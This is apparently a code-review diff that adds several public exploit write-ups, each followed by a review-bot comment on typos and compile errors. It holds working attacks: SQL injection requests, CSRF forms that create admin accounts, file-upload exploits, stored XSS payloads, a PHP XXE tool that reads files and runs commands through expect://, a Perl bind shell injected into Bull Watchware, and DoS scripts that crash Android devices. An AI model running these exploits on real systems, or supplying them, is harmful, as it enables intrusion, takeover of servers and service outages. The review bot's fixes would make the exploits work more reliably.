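Review bot: The one-line description following the "// source:" line sits outside any comment, so the file as added does not compile; wrap it in /* */ like the copyright banner beneath it. The source also declares "main" with no return type, relies on implicit declarations (memcpy/strlen, exit/atoi, inet_addr, ioctl) with no <string.h>, <stdlib.h>, <arpa/inet.h> or <sys/ioctl.h>, re-declares "int cnt" inside the select loop so it shadows the "cnt" declared at the top of main, and has a stray ";;" after "nb.len=sizeof(struct sockaddr_in)". The note to first fingerprint the exact OS level is the right caution given that the 41/42 switch patches hard-coded syscall numbers.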


@ -0,0 +1,43 @@
*******************************Blind SQL/XPath injection in OPMANAGER***********************************88
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
Description
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Vulnerable:
http://<Ip adress:8060>overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0
Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache
Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
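Review bot: The "Version" field still holds the template placeholder "[app version]", and the block labelled "Request:" is actually the server response ("HTTP/1.1 200 OK ..."); the real request starts at the "Get" line above it, so the labels are swapped. Minor: the first URL is missing the "/" between ":8060>" and "overview.do", "Ip adress" should be "IP address", and "Tues" is not a valid HTTP date day name (RFC 1123 uses "Tue").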


@ -0,0 +1,77 @@
==============================================================================
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
[»] FileExecutive Multiple Vulnerabilities
==============================================================================
[»] Script: [ FileExecutive v1.0.0 ]
[»] Language: [ PHP ]
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploits ]===
Add/Edit Admin CSRF:
<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td> <td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>
Shell Upload:
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
Local File Disclosure:
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
Full Path Disclosure:
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
Author: ViRuSMaN <-
###########################################################################
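Review bot: The CSRF form's <th>/<td> cells (starting at "<th colspan='5'>Add A user") sit outside any <table> or <tr>, so the markup is invalid HTML; browsers still submit the POST, but the layout will not render as intended. The header block has no date and no disclosed/fixed status, and the "Shell Upload" entry is a one-line description with nothing a maintainer could verify against, unlike the CSRF section which names add_user.php.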


@ -0,0 +1,149 @@
# Title : PHPnuke 8.2 Remote Upload File Exploit
# Author : Net.Edit0r
# Location : Iran
# Dork : "POWERED BY PHPNUKE.IR"
# Category : Remote
# Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com
# Special Thanks To :NetQurd (For help in finding bugs) > Email
:NetQurd@Live.CoM
[~]######################################### InformatioN
#############################################[~]
[~] 1.Save code html format
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
[~] 4.Save Html Page
[~] 5.Open Page Html (Edite Source)
[~] 6.Set Format PHP
[~] 7.Choose File & Upload
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.Target.com/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
[~] 1. Exploit File :
<!--
* FCKeditor - The text editor for Internet - http://www.Sun
* Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - By Net.Edit0r</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%"
border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
</td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame"
width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>
[~]######################################## ThankS To ...
#########################################[~]
[~] Special Thanks To My Best FriendS :
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , Zend
[~] IRANIAN Young HackerZ
[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR
[~]######################################### FinisH :D
#############################################[~]
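Review bot: The onclick handlers GetFolders(), GetFoldersAndFiles(), CreateFolder() and SetAction() are never defined anywhere in this file, and the upload form's action attribute is empty, so as pasted the page cannot carry out steps 5 to 9 of the "InformatioN" list; the script portion of the FCKeditor test page it was copied from is absent, and the entry should be flagged as incomplete rather than presented as a working PoC. The header also lacks a version and a vendor/fix reference; "Dork" and the greetings are not a substitute for those.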


@ -0,0 +1,54 @@
# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996
# Software Description
# TrendMicro Interscan Messaging Security is the industrys most comprehensive
# mail gateway security. Choose state-of-the-art software or a hybrid solution
# with on-premise virtual appliance and optional cloud pre-filter that blocks
# the vast majority of spam and malware outside your network. Plus our Data
# Privacy and Encryption Module secure outbound data to ensure privacy and
# regulatory compliance.
# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79)
# and cross-site request forgery (CWE-352) vulnerabilities.
# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>
# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>
# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>
# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html
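Review bot: Typos in the description block: "industrys" should be "industry's", "Each time we access to this page" should be "each time this page is accessed", and "when perform this POC" should be "when performing this PoC". The header carries the two CVE IDs but no fixed build, so add the build in which the vendor corrected the XSS and the missing anti-CSRF protection so readers can tell whether 7.1 Build_Win32_1394 is the last affected release.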


@ -0,0 +1,105 @@
# Exploit Title: Plesk SSO XXE injection (Old bug) Exploit #
# Date: 12 06 2014 #
# Exploit Author: z00 #
# Software Link: http://www.parallels.com/ #
# Version: 11.0.9 10.4.4 #
# Tested on: linux all #
<?php
/*
████████████████████████████
█______¶¶¶¶¶¶______________█
█____¶¶¶¶¶¶¶¶¶¶____________█
█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
█_¶¶¶¶¶¶¶______¶¶¶_________█
█_¶¶¶¶¶¶________¶¶__¶¶_____█
█_¶¶¶¶¶¶____________¶¶¶____█
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
█_¶¶¶¶¶____________¶¶¶¶¶¶__█
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
█_¶¶¶¶¶¶____________¶¶¶_¶¶_█
█__¶¶¶¶¶¶______¶¶___¶¶_____█
█__¶¶¶¶¶¶¶____¶¶¶__________█
█___¶¶¶¶¶¶¶¶¶¶¶¶___________█
█____¶¶¶¶¶¶¶¶¶¶____________█
█_____¶¶¶¶¶¶¶______________█
████████████████████████████
Plesk SSO XXE injection (Old bug) Exploit
Coded by z00 (electrocode)
Twitter: electrocode
Not: Tor kurulu değilse proxy kismini kaldirin
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
*/
function Gonder($domain,$komut,$method){
switch($method)
{
case "cmd":
$komut = "expect://$komut";
break;
case "read":
$komut = "file://$komut";
break;
default:
$komut = "file://$komut";
}
$adres = "https://$domain:8443/relay";
$paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] >
<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform
Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>";
$exploit = urlencode(base64_encode($paket));
$relaystate = gethostbyname($domain);
$relayadres = urlencode(base64_encode($relaystate));
$postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$adres);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_REFERER,$adres);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
//Proxy
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
//Proxy end
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$sonuc = curl_exec ($ch);
curl_close ($ch);
$gelenpaket = //"Paket: " . $postlar .
"Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";
return $gelenpaket;
}
if($argc < 4){
$kullanim = "########################################################################\n";
$kullanim .= "Plesk XXE Exploit Tool by z00\n";
$kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n";
$kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n";
$kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n";
$kullanim .= "########################################################################\r\n";
echo $kullanim;
} else {
$domain = $argv[1];
$komut = $argv[2];
$method = $argv[3];
echo Gonder($domain,$komut,$method);
}
?>
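Review bot: The usage text prints "php $argv[0].php", but $argv[0] already contains the script name, so the hint shows a doubled ".php" suffix; the "Example" line also puts "cmd" in the command position and the literal word "method" in the method position, which does not match the Gonder($domain,$komut,$method) signature. The comments and usage strings are in Turkish ("Not: Tor kurulu değilse proxy kismini kaldirin" means "Note: if Tor is not installed, remove the proxy part"; "Kullanimi" means "Usage"; "Kullanilabilir Methodlar" means "Available methods"), and the SOCKS5 proxy at 127.0.0.1:9050 is hard-coded with no switch, so an English usage line and a proxy option would help. The header's "Tested on: linux all" is not a version statement.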


@ -0,0 +1,41 @@
Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.
Marble effect in the web banner and questionable font: it smells the 90s !
Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:
Trivial admin credentials
Authenticated user can write on the system file
Authenticated user can inject OS commands
By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.
We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesnt matter, lets do some archeology alone.
Here are the details:
1. Trivial creds: smwadmin/bullsmw
2. Authenticated user can write on the system file
A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).
But these filters are written on disk and you can call them using the following OS command injection.
Request to write the shellcode:
http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A
The shellcode we used:
perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'
3. Authenticated user can inject OS commands
When listing the processes you can apply a filter… and inject a single command using backticks, great !
Very useful to execute our shellcode which was stored in a single file (the filter).
Request to execute the shellcode:
http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"
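Review bot: The listener port in the URL-encoded "write" request ("$p=2222") does not match the "shellcode we used" listing ("$p=2223"), and the "execute" request ends with a stray double quote after the closing backtick; make the two listings agree so a reader reproducing the finding is not misled. Minor: "doesnt" and "lets" need apostrophes, "write on the system file" reads as "write to the filesystem", and the write-up names no product version or date beyond "more than one year ago".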


@ -0,0 +1,31 @@
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>
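Review bot: The "Vendor Homepage" and "Software Link" fields point to computrols.com, while the title, version, CVE-2019-7671 and the Applied Risk advisory all refer to Prima Access Control; those two URLs appear to have been carried over from a different entry and should be corrected or removed. "Tested on: NA" and "Google Dork: NA" add nothing, and the request shows "Content-Length: 265" for a body that is reproduced on a single line, so note that the length is for the body as sent, not as displayed.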


@ -0,0 +1,82 @@
# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#
##### Vulnerability #####
FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.
Successful exploitation will causes devices to restart.
Android Security Team has confirmed this issue.
I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.
##### Vendor Timeline #####
Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes. Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances. I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with. Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure
Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure
##### PoC #####
#!/usr/bin/python
# Android FTPServer PoC Device Crash
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print x
s.connect(('172.16.30.108',2121))
data=s.recv(1024)
s.send("USER test\r\n")
data=s.recv(1024)
s.send("PASS test\r\n")
s.send(buffer)
s.send("QUIT")
s.close()
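Review bot: `s.send("QUIT")` at the end of the loop body omits the CRLF terminator that every other command in the script carries (`s.send("USER test\r\n")`, `s.send("PASS test\r\n")`), so the server never sees a complete QUIT and the session is simply torn down by `s.close()`; use `s.send("QUIT\r\n")` for consistency. The script is Python 2 only (`xrange`, `print x`, sending `str` objects), which the `#!/usr/bin/python` shebang does not make explicit, and the target `172.16.30.108:2121` is hard-coded where a command-line argument would do. On the documentation side, the Developer timeline records a new version on 1/29/12 and the Android timeline says the "impacted component" was isolated, but the write-up never names the fixed FTPServer version, so a reader cannot tell whether a given install is patched.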


@ -0,0 +1,92 @@
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#
##### Vulnerability #####
The Android OS is vulnerable to a local DoS when a filename with a
length of 2048
or larger is attempted to be written to the sdcard(vfat fs) multiple times.
The result of successful running of the exploit code is the system restarting.
The vulnerability only effects Android kernels that are in the version
2.6 family.
##### Vendor Timeline #####
The Android Security Team has been contacted with updated PoC code and
details.
They have been aware of this vulnerability for over a year.
##### Tombstone #####
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint:
'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
r0 00000000 r1 00000008 r2 00000040 r3 00000000
r4 2a114310 r5 00000000 r6 51504690 r7 00000025
r8 2a114330 r9 2a114350 sl 00000003 fp 00000003
ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010
d0 4271bc7bd0b80000 d1 0000000000000000
d2 0000000000000000 d3 427181eae9200000
d4 0000000000000000 d5 0000000000000000
d6 0000000000000000 d7 0000000000000000
d8 0000000000000000 d9 0000000000000000
d10 0000000000000000 d11 0000000000000000
d12 0000000000000000 d13 0000000000000000
d14 0000000000000000 d15 0000000000000000
d16 3fe99999a0000000 d17 3fe999999999999a
d18 0033003200310030 d19 0000000000000000
d20 3fc554e7eb0eb47c d21 3e66376972bea4d0
d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b
d24 3fede16b9c24a98f d25 3fe55559ee5e69f9
d26 0000000000000000 d27 0000000000000000
d28 0000000000000005 d29 0000000000000000
d30 0000000000000000 d31 0000000000000000
scr 20000010
backtrace:
#00 pc 0000dcf0 /system/lib/libc.so (kill+12)
#01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
##### PoC #####
#include <stdio.h>
int main(int argc, char** argv) {
char buf[5000];
int j,k;
FILE *fp;
/* Path to sdcard, typically /sdcard/ */
strcpy(buf,"/sdcard/");
for(k=0;k<=2048;k++){
strcat(buf,"A");
};
for(j=0;j<=50;j++){
fp=fopen(buf,"w");
};
return 0;
}
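Review bot: the PoC calls `strcpy` and `strcat` without `#include <string.h>`; C99 removed implicit function declarations and recent GCC/Clang reject them by default, so the include is needed for the file to build. `fp=fopen(buf,"w");` inside the `j` loop never checks the return value and never calls `fclose`, so the PoC cannot tell whether the 51 opens succeed or fail, and every successful one leaks a FILE handle; checking `fp == NULL` and closing on success would make the trigger condition explicit. Minor: the `};` after each `for` block is a stray empty statement, and `k<=2048` appends 2049 characters (2057 with the `/sdcard/` prefix), which matches the "2048 or larger" wording but should be stated. The tombstone shows `signal 8 (SIGFPE)` in `SensorService` within `system_server` with a backtrace of `__aeabi_idiv0` frames, i.e. an integer division by zero, and the write-up never explains how a long-filename write on the vfat sdcard leads to that fault, so the link between the trigger and the crash is undocumented.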


@ -0,0 +1,511 @@
################# BootReceiver.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
